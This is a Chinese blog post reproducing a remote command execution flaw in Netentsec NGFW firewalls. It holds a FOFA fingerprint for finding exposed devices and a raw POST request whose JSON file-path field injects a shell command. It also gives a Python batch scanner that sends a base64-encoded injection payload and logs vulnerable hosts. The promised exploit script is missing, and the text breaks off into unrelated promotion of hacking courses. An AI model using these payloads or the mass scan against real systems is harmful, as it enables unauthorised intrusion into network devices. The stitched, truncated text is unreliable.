网康NGFW下一代防火墙远程命令执行漏洞复现_网康防火墙rce

声明：以下脚本具有攻击性，请勿非法使用，否则后果自负。请勿进行非授权测试，否则后果自负。

1.前言

2021HW期间，北京网康科技有限公司网康NGFW下一代防火墙被爆出远程命令执行漏洞。CNVD上还没查到漏洞编号，应该是CNVD还未公开该漏洞。但是网上已有人复现和漏洞分析的文章。

2.漏洞概述

网康下一代防火墙（NGFW）是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。但该NGFW存在远程命令执行漏洞，攻击者可通过构造特殊请求执行系统命令。

3.漏洞原理

漏洞存在html\applications\directdata\controllers\DirectController.php文件中， 漏洞关键代码：

漏洞分析可参考：[www.o2oxy.cn/3433.html](https://link.juejin.cn/?target=https%3A%2F%2Fwww.o2oxy.cn%2F3433.html "https://www.o2oxy.cn/3433.html"

4.影响版本

版本未知（20210419之前的版本）

5.漏洞等级

高危

6.漏洞复现

6.1 FOFA实战复现

FOFA关键词：

cert="11558588834859436962"

POST Payload：
POST /directdata/direct/router HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
 
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/.atest.txt;whoami >/var/www/html/atest.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} 

6.2 netentsec_NGFW_RCE_POC.py

#!/usr/bin/python
# Env: python3
# Author: afei00123
# -*- coding: utf8 -*-
 
import requests, urllib3, base64, time, json, argparse
from colorama import init
init(autoreset=True)
 
def title():print("")print('*'.center(60, '*'))print("网康NGFW下一代防火墙（版本未知）".center(30))print("github：https://github.com/ltfafei".center(50))print("gitee：https://gitee.com/afei00123".center(50))print("CSDN: afei00123.blog.csdn.net".center(50))print("公众号：网络运维渗透".center(40))print("")print('*'.center(60, '*'))print("")
 
class netentsec_NGFW_POC():def NGFW_RCE_Check(self, url):urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)target_url = f"{url}/directdata/direct/router"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36","Cache-Control": "max-age=0","accept": "image/avif,image/webp,image/apng,image/*,*/*;q=0.8","sec-ch-ua": '"Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"',"sec-ch-ua-mobile": "?0","Upgrade-Insecure-Requests": "1","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","Sec-Fetch-Site": "none","Sec-Fetch-Mode": "navigate","Sec-Fetch-User": "?1","Sec-Fetch-Dest": "document","Accept-Encoding": "gzip, deflate","Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8","Cookie": "PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A","Content-Type": "application/x-www-form-urlencoded",}payload = base64.b64decode("eyJhY3Rpb24iOiJTU0xWUE5fUmVzb3VyY2UiLCJtZXRob2QiOiJkZWxldGVJbWFnZSIsImRhdGEiOlt7ImRhdGEiOlsiL3Zhci93d3cvaHRtbC8uYXRlc3QudHh0O2VjaG8gYWZlaWNvbWUgPi92YXIvd3d3L2h0bWwvYXRlc3QudHh0Il19XSwidHlwZSI6InJwYyIsInRpZCI6MTcsImY4ODM5cDdycXRqIjoiPSJ9")try:s = requests.session()list_data = s.post(target_url, headers=headers, data=payload, verify=False, timeout=2).json()status = list_data[0]['result'].get("success")if status:print(f"\033[31m[+] {url}极有可能存在远程命令执行漏洞！")with open("NGFW_RCE_vuln.txt", "a+") as f:f.writelines(url + "\n")except Exception as e:print(f"[n] {url}不存在该漏洞。")return urldef NGFW_Batch_Check(self, url, file):if url:return Trueelif file:for url in file:url = url.replace('\n', '')time.sleep(1)self.NGFW_RCE_Check(url)
 
if (__name__ == "__main__"):title()parser = argparse.ArgumentParser(description="netentsec NGFW RCE POC")parser.add_argument('-u', '--url', type=str,help='Please input target url. eg: https://ip:port')parser.add_argument('-f', '--file', type=argparse.FileType('r'),help='Please input urls file path. eg: c:\\urls.txt')args = parser.parse_args()run_POC = netentsec_NGFW_POC()if args.file:run_POC.NGFW_Batch_Check(args.url, args.file)print("\n[done] 批量探测完成，请查看：NGFW_RCE_vuln.txt")if args.url:run_POC.NGFW_RCE_Check(args.url) 

6.3 netentsec_NGFW_RCE_EXP.py

网络安全成长路线图

这个方向初期比较容易入门一些，掌握一些基本技术，拿起各种现成的工具就可以开黑了。不过，要想从脚本小子变成hei客大神，这个方向越往后，需要学习和掌握的东西就会越来越多，以下是学习网络安全需要走的方向：

# 网络安全学习方法

上面介绍了技术分类和学习路线，这里来谈一下学习方法：

## 视频学习

无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习，当然如果你还不知道选择那套学习，我这里也整理了一套和上述成长路线图挂钩的视频教程，完整版的视频已经上传至CSDN官方，朋友们如果需要可以点击这个链接免费领取。网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！